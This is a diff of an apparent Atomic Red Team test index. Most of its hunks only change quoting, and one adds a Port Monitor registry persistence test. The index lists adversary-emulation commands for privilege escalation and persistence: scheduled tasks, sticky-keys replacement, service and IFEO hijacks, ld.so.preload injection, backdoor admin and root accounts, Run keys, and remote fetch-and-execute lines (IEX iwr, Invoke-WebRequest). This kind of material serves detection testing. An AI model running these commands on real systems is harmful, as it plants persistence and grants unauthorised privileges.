- windows input_arguments: @@ -6687,10 +6711,10 @@ privilege-escalation: elevation_required: false command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} -' + ' cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 -' + ' - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: | @@ -6726,11 +6750,11 @@ privilege-escalation: command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} -' + ' cleanup_command: 'SCHTASKS /Delete /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /F >nul 2>&1 -' + ' - name: Powershell Cmdlet Scheduled Task auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd description: | @@ -6752,7 +6776,7 @@ privilege-escalation: cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 -' + ' - name: Task Scheduler via VBA auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 description: | @@ -6769,7 +6793,7 @@ privilege-escalation: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -6780,7 +6804,7 @@ privilege-escalation: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\" @@ -6917,7 +6941,7 @@ privilege-escalation: sets it as the screensaver so it will execute for persistence. Requires a reboot and logon. -' + ' supported_platforms: - windows input_arguments: @@ -7172,7 +7196,7 @@ privilege-escalation: description: 'Change Service registry ImagePath of a bengin service to a malicious file -' + ' supported_platforms: - windows input_arguments: @@ -7192,22 +7216,22 @@ privilege-escalation: dependencies: - description: 'The service must exist (#{weak_service_name}) -' + ' prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" -' + ' executor: command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" -' + ' cleanup_command: 'sc.exe delete #{weak_service_name} -' + ' name: command_prompt T1548.001: technique: @@ -7263,7 +7287,7 @@ privilege-escalation: description: 'Make, change owner, and change file attributes on a C source code file -' + ' supported_platforms: - macos - linux @@ -7289,7 +7313,7 @@ privilege-escalation: auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 description: 'This test sets the SetUID flag on a file in Linux and macOS. -' + ' supported_platforms: - macos - linux @@ -7305,14 +7329,14 @@ privilege-escalation: sudo chmod u+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} -' + ' name: sh elevation_required: true - name: Set a SetGID flag on file auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c description: 'This test sets the SetGID flag on a file in Linux and macOS. -' + ' supported_platforms: - macos - linux @@ -7328,7 +7352,7 @@ privilege-escalation: sudo chmod g+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} -' + ' name: sh elevation_required: true T1547.009: @@ -7398,7 +7422,7 @@ privilege-escalation: #{shortcut_file_path} cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1 -' + ' name: command_prompt - name: Create shortcut to cmd in startup folders auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 @@ -7497,10 +7521,10 @@ privilege-escalation: executor: command: 'sudo touch /Library/StartupItems/EvilStartup.plist -' + ' cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist -' + ' name: sh elevation_required: true T1548.003: @@ -7566,7 +7590,7 @@ privilege-escalation: auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e description: 'Common Sudo enumeration methods. -' + ' supported_platforms: - macos - linux @@ -7580,7 +7604,7 @@ privilege-escalation: This is dangerous to modify without using ''visudo'', do not do this on a production system. -' + ' supported_platforms: - macos - linux @@ -7595,7 +7619,7 @@ privilege-escalation: description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using ''visudo'', do not do this on a production system. -' + ' supported_platforms: - macos - linux @@ -7698,7 +7722,7 @@ privilege-escalation: description: 'This test creates a Systemd service unit file and enables it as a service. -' + ' supported_platforms: - linux input_arguments: @@ -8634,10 +8658,10 @@ privilege-escalation: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) -' + ' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -8670,10 +8694,10 @@ privilege-escalation: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) -' + ' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -8769,11 +8793,11 @@ privilege-escalation: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force -' + ' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore -' + ' name: powershell - name: Winlogon Userinit Key Persistence - PowerShell auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb @@ -8792,11 +8816,11 @@ privilege-escalation: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force -' + ' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore -' + ' name: powershell - name: Winlogon Notify Key Logon Persistence - PowerShell auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 @@ -8818,7 +8842,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore -' + ' name: powershell persistence: T1546.004: @@ -8876,7 +8900,7 @@ persistence: auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f description: 'Adds a command to the .bash_profile file of the current user -' + ' supported_platforms: - macos - linux @@ -8888,13 +8912,13 @@ persistence: executor: command: 'echo "#{command_to_add}" >> ~/.bash_profile -' + ' name: sh - name: Add command to .bashrc auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f description: 'Adds a command to the .bashrc file of the current user -' + ' supported_platforms: - macos - linux @@ -8906,7 +8930,7 @@ persistence: executor: command: 'echo "#{command_to_add}" >> ~/.bashrc -' + ' name: sh T1546.008: technique: @@ -8998,7 +9022,7 @@ persistence: description: 'Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" -' + ' type: String default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe @@ -9006,7 +9030,7 @@ persistence: description: 'Full path to process to attach to target in #{parent_list}. Default: cmd.exe -' + ' type: Path default: C:\windows\system32\cmd.exe executor: @@ -9040,7 +9064,7 @@ persistence: auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 description: 'Replace sticky keys binary (sethc.exe) with cmd.exe -' + ' supported_platforms: - windows executor: @@ -9051,7 +9075,7 @@ persistence: copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe -' + ' name: command_prompt elevation_required: true T1098: @@ -9125,7 +9149,7 @@ persistence: auto_generated_guid: 5598f7cb-cf43-455e-883a-f6008c5d46af description: 'Manipulate Admin Account Name -' + ' supported_platforms: - windows executor: @@ -9191,7 +9215,7 @@ persistence: dependencies: - description: 'PS Module ActiveDirectory -' + ' prereq_command: "Try {\n Import-Module ActiveDirectory -ErrorAction Stop | Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n" get_prereq_command: | @@ -9214,7 +9238,7 @@ persistence: cleanup_command: 'Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))" | Remove-ADUser -Confirm:$False -' + ' name: powershell T1098.003: technique: @@ -9587,11 +9611,11 @@ persistence: - description: 'Reg files must exist on disk at specified locations (#{registry_file} and #{registry_cleanup_file}) -' + ' prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null @@ -9600,11 +9624,11 @@ persistence: - description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and T1546.010x86.dll) -' + ' prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll @@ -9612,10 +9636,10 @@ persistence: executor: command: 'reg.exe import #{registry_file} -' + ' cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1546.011: @@ -9721,31 +9745,31 @@ persistence: - description: 'Shim database file must exist on disk at specified location (#{file_path}) -' + ' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}" - description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll -' + ' prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll executor: command: 'sdbinst.exe #{file_path} -' + ' cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: New shim database files created in the default shim database directory @@ -9837,7 +9861,7 @@ persistence: description: 'This test submits a command to be run in the future by the `at` daemon. -' + ' supported_platforms: - linux input_arguments: @@ -9853,30 +9877,30 @@ persistence: dependencies: - description: 'The `at` and `atd` executables must exist in the PATH -' + ' prereq_command: 'which at && which atd -' + ' get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'' -' + ' - description: 'The `atd` daemon must be running -' + ' prereq_command: 'systemctl status atd || service atd status -' + ' get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'' -' + ' executor: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec} -' + ' T1053.002: technique: external_references: @@ -9973,7 +9997,7 @@ persistence: elevation_required: false command: 'at 13:20 /interactive cmd -' + ' T1547.002: technique: id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec @@ -10131,10 +10155,10 @@ persistence: command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} -' + ' cleanup_command: 'del #{local_file} >nul 2>&1 -' + ' name: command_prompt - name: Bitsadmin Download (PowerShell) auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc @@ -10158,10 +10182,10 @@ persistence: command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file} -' + ' cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore -' + ' name: powershell - name: Persist, Download, & Execute auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae @@ -10199,7 +10223,7 @@ persistence: bitsadmin.exe /complete #{bits_job_name} cleanup_command: 'del #{local_file} >nul 2>&1 -' + ' name: command_prompt - name: Bits download using desktopimgdownldr.exe (cmd) auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 @@ -10231,10 +10255,10 @@ persistence: command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr -' + ' cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >null 2>&1 -' + ' name: command_prompt T1547: technique: @@ -10535,7 +10559,7 @@ persistence: auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938 description: 'Create a file called test.wma, with the duration of 30 seconds -' + ' supported_platforms: - linux - windows @@ -10555,7 +10579,7 @@ persistence: sent from a compromised host. This will install one (of many) available VPNS in the Edge add-on store. -' + ' supported_platforms: - windows - macos @@ -10675,7 +10699,7 @@ persistence: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -10720,7 +10744,7 @@ persistence: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -10758,7 +10782,7 @@ persistence: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -10875,10 +10899,10 @@ persistence: executor: command: 'assoc #{extension_to_change}=#{target_extension_handler} -' + ' cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler} -' + ' name: command_prompt elevation_required: true T1136.003: @@ -11352,7 +11376,7 @@ persistence: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. -' + ' supported_platforms: - macos - linux @@ -11372,7 +11396,7 @@ persistence: echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} cleanup_command: 'crontab /tmp/notevil -' + ' - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, @@ -11380,7 +11404,7 @@ persistence: schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - macos - linux @@ -11412,7 +11436,7 @@ persistence: to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - linux input_arguments: @@ -11429,10 +11453,10 @@ persistence: name: bash command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} -' + ' cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} -' + ' T1574.001: technique: created: '2020-03-13T18:11:08.357Z' @@ -11605,10 +11629,10 @@ persistence: dependencies: - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) -' + ' prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" @@ -11616,7 +11640,7 @@ persistence: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 -' + ' name: command_prompt T1078.001: technique: @@ -11754,7 +11778,7 @@ persistence: auto_generated_guid: fcec2963-9951-4173-9bfa-98d8b7834e62 description: 'Creates a new domain admin user in a command prompt. -' + ' supported_platforms: - windows input_arguments: @@ -11776,14 +11800,14 @@ persistence: net group "#{group}" "#{username}" /add /domain cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain -' + ' name: command_prompt elevation_required: false - name: Create a new account similar to ANONYMOUS LOGON auto_generated_guid: dc7726d2-8ccb-4cc6-af22-0d5afb53a548 description: 'Create a new account similar to ANONYMOUS LOGON in a command prompt. -' + ' supported_platforms: - windows input_arguments: @@ -11798,10 +11822,10 @@ persistence: executor: command: 'net user "#{username}" "#{password}" /add /domain -' + ' cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain -' + ' name: command_prompt elevation_required: false - name: Create a new Domain Account using PowerShell @@ -11809,7 +11833,7 @@ persistence: description: 'Creates a new Domain User using the credentials of the Current User -' + ' supported_platforms: - windows input_arguments: @@ -11838,7 +11862,7 @@ persistence: $User cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain -' + ' name: powershell elevation_required: false T1078.002: @@ -12011,7 +12035,7 @@ persistence: description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 -' + ' supported_platforms: - macos input_arguments: @@ -12275,7 +12299,7 @@ persistence: description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list -' + ' supported_platforms: - windows input_arguments: @@ -12288,12 +12312,12 @@ persistence: type: String default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme" -' + ' dependency_executor_name: powershell dependencies: - description: 'Chrome must be installed -' + ' prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} @@ -12516,7 +12540,7 @@ persistence: auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 description: 'Leverage Global Flags Settings -' + ' supported_platforms: - windows input_arguments: @@ -12532,19 +12556,19 @@ persistence: command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" -' + ' cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: IFEO Global Flags auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 description: 'Leverage Global Flags Settings -' + ' supported_platforms: - windows input_arguments: @@ -12734,7 +12758,7 @@ persistence: description: 'This test uses the insmod command to load a kernel module for Linux. -' + ' supported_platforms: - linux input_arguments: @@ -12758,10 +12782,10 @@ persistence: dependencies: - description: 'The kernel module must exist on disk at specified location -' + ' prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; cp #{module_source_path}/* #{temp_folder}/ @@ -12770,7 +12794,7 @@ persistence: executor: command: 'sudo insmod #{module_path} -' + ' cleanup_command: | sudo rmmod #{module_name} [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder} @@ -12914,21 +12938,21 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' -' + ' cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload -' + ' name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD @@ -12953,18 +12977,18 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'LD_PRELOAD=#{path_to_shared_library} ls -' + ' name: bash T1547.008: technique: @@ -13115,7 +13139,7 @@ persistence: auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 description: 'Create a plist and execute it -' + ' supported_platforms: - macos input_arguments: @@ -13132,15 +13156,15 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) -' + ' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "The shared library doesn''t exist. Check the path"; exit 1; -' + ' executor: name: bash elevation_required: true @@ -13229,7 +13253,7 @@ persistence: auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf description: 'Utilize LaunchDaemon to launch `Hello World` -' + ' supported_platforms: - macos input_arguments: @@ -13246,15 +13270,15 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) -' + ' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and try again."; exit 1; -' + ' executor: name: bash elevation_required: true @@ -13398,7 +13422,7 @@ persistence: auto_generated_guid: 40d8eabd-e394-46f6-8785-b9bfa1d011d2 description: 'Create a user via useradd -' + ' supported_platforms: - linux input_arguments: @@ -13409,17 +13433,17 @@ persistence: executor: command: 'useradd -M -N -r -s /bin/bash -c evil_account #{username} -' + ' cleanup_command: 'userdel #{username} -' + ' name: bash elevation_required: true - name: Create a user account on a MacOS system auto_generated_guid: '01993ba5-1da3-4e15-a719-b690d4f0f0b2' description: 'Creates a user on a MacOS system with dscl -' + ' supported_platforms: - macos input_arguments: @@ -13441,7 +13465,7 @@ persistence: dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username} cleanup_command: 'dscl . -delete /Users/#{username} -' + ' name: bash elevation_required: true - name: Create a new user in a command prompt @@ -13463,10 +13487,10 @@ persistence: executor: command: 'net user /add "#{username}" "#{password}" -' + ' cleanup_command: 'net user /del "#{username}" >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Create a new user in PowerShell @@ -13484,10 +13508,10 @@ persistence: executor: command: 'New-LocalUser -Name "#{username}" -NoPassword -' + ' cleanup_command: 'Remove-LocalUser -Name "#{username}" -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Create a new user in Linux with `root` UID and GID. @@ -13495,7 +13519,7 @@ persistence: description: 'Creates a new user in Linux and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign. -' + ' supported_platforms: - linux input_arguments: @@ -13513,14 +13537,14 @@ persistence: if [ $(cat /etc/os-release | grep -i 'Name="ubuntu"') ]; then echo "#{username}:#{password}" | sudo chpasswd; else echo "#{password}" | passwd --stdin #{username}; fi; cleanup_command: 'userdel #{username} -' + ' name: bash elevation_required: true - name: Create a new Windows admin user auto_generated_guid: fda74566-a604-4581-a4cc-fbbe21d66559 description: 'Creates a new admin user in a command prompt. -' + ' supported_platforms: - windows input_arguments: @@ -13538,7 +13562,7 @@ persistence: net localgroup administrators "#{username}" /add cleanup_command: 'net user /del "#{username}" >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1078.003: @@ -13662,7 +13686,7 @@ persistence: auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 description: 'Mac logon script -' + ' supported_platforms: - macos executor: @@ -13807,7 +13831,7 @@ persistence: description: 'Netsh interacts with other operating system components using dynamic-link library (DLL) files -' + ' supported_platforms: - windows input_arguments: @@ -13818,7 +13842,7 @@ persistence: executor: command: 'netsh.exe add helper #{helper_file} -' + ' name: command_prompt T1037.003: technique: @@ -14112,7 +14136,7 @@ persistence: - Office 365 identifier: T1137.002 atomic_tests: - - name: Office Apllication Startup Test Persistence + - name: Office Application Startup Test Persistence auto_generated_guid: c3e35b58-fe1c-480b-b540-7600fb612563 description: | Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office @@ -14128,11 +14152,11 @@ persistence: command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /t REG_SZ /d "#{thing_to_execute}" -' + ' cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" -' + ' name: command_prompt T1137.003: technique: @@ -14267,11 +14291,11 @@ persistence: command: 'reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /t REG_SZ /d #{url} /f -' + ' cleanup_command: 'reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /f -' + ' T1137.005: technique: external_references: @@ -14729,7 +14753,7 @@ persistence: auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 description: 'Modify MacOS plist file in one of two directories -' + ' supported_platforms: - macos executor: @@ -14858,7 +14882,31 @@ persistence: - Travis Smith, Tripwire x_mitre_platforms: - Windows - atomic_tests: [] + identifier: T1547.010 + atomic_tests: + - name: Add Port Monitor persistence in Registry + auto_generated_guid: d34ef297-f178-4462-871e-9ce618d44e50 + description: Add key-value pair to a Windows Port Monitor registry. On the subsequent + reboot dll will be execute under spoolsv with NT AUTHORITY/SYSTEM privilege. + supported_platforms: + - windows + input_arguments: + monitor_dll: + description: Addition to port monitor registry key. Normally refers to a + DLL name in C:\Windows\System32. arbitrary DLL can be loaded if permissions + allow writing a fully-qualified pathname for that DLL. + type: Path + default: C:\Path\AtomicRedTeam.dll + executor: + command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART" + /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ + + ' + cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" + + ' + name: command_prompt + elevation_required: true T1546.013: technique: external_references: @@ -14942,7 +14990,7 @@ persistence: profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched. -' + ' supported_platforms: - windows input_arguments: @@ -14958,13 +15006,13 @@ persistence: dependencies: - description: 'Ensure a powershell profile exists for the current user -' + ' prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force -' + ' executor: command: | Add-Content #{ps_profile} -Value "" @@ -15201,7 +15249,7 @@ persistence: command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello World"'' >> /etc/rc.common -' + ' elevation_required: true name: bash T1547.007: @@ -15284,10 +15332,10 @@ persistence: executor: command: 'sudo defaults write com.apple.loginwindow LoginHook #{script} -' + ' cleanup: 'sudo defaults delete com.apple.loginwindow LoginHook -' + ' elevation_required: true name: sh T1108: @@ -15493,11 +15541,11 @@ persistence: command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" -' + ' cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f >nul 2>&1 -' + ' name: command_prompt - name: Reg Key RunOnce auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb @@ -15515,11 +15563,11 @@ persistence: command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}" -' + ' cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: PowerShell Registry RunOnce @@ -15545,7 +15593,7 @@ persistence: cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Suspicious vbs file run from startup Folder @@ -15766,10 +15814,10 @@ persistence: ~/.ssh/authorized_keys); echo $ssh_authorized_keys > ~/.ssh/authorized_keys; fi; -' + ' cleanup_command: 'unset ssh_authorized_keys -' + ' T1053.005: technique: external_references: @@ -15867,7 +15915,7 @@ persistence: description: 'Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. -' + ' supported_platforms: - windows input_arguments: @@ -15884,10 +15932,10 @@ persistence: elevation_required: false command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} -' + ' cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 -' + ' - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: | @@ -15923,11 +15971,11 @@ persistence: command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} 